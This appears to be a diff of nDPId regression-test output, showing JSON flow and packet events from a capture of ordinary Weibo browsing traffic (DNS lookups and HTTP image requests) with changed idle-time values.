-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1463089073321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073321,"pkt":"kDVu60UQeJKcD6iOCABFAAA80r9AAEAGwTjAqAFpXbyG9ovfAFBlcdtMAAAAAKACchBYCgAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073322,"flow_last_seen":1463089073322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073322,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1463089073322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073322,"pkt":"kDVu60UQeJKcD6iOCABFAAA8W1BAAEAGOKjAqAFpXbyG9ovgAFAoLVKkAAAAAKACchAd9QAAAgQFtAQCCAoAQQn0AAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073334,"flow_last_seen":1463089073334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073334,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1463089073393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1463089073393,"pkt":"eJKcD6iOkDVu60UQCABFAACRAABAAEARtqHAqAEBwKgBaQA1RnMAfV+\/WFGBgAABAAMAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQABwAwABQABAAAACQAZBWFkaW1nBGdzbGIIc2luYWVkZ2UDY29tAMAzAAUAAQAAAAoADQV3ZWlibwRncmlkwD7AWAABAAEAAAAvAATeSRxg"} 
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KDNAAEARjsDAqAFpwKgBAS4WADUAK\/dEyn0BAAABAAAAAAAAB2FjY291bnQFd2VpYm8DY29tAAABAAE="} 
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1463089073423,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1463089073423,"pkt":"eJKcD6iOkDVu60UQCABFAACwAABAAEARtoLAqAEBwKgBaQA1oYgAnCOtK+iBgAABAAUAAAAAAmpzAXQGc2luYWpzAmNuAAABAAHADAAFAAEAAAA8AAcEd2NkbsARwCwABQABAAAAKQAVBnNpbmFqcwVjc2dsYgV0eGNkbsAYwD8ABQABAAAEEgAUCG40Y3N3aGszBWdjY2RuA25ldADAYAABAAEAAAADAARdvIb2wGAAAQABAAAAAwAEXbyG8Q=="} 
00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA4KDhAAEARjsLAqAFpwKgBAUGkADUAJAai81YBAAABAAAAAAAAAWMFd2VpYm8CY24AAAEAAQ=="} 
00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} 
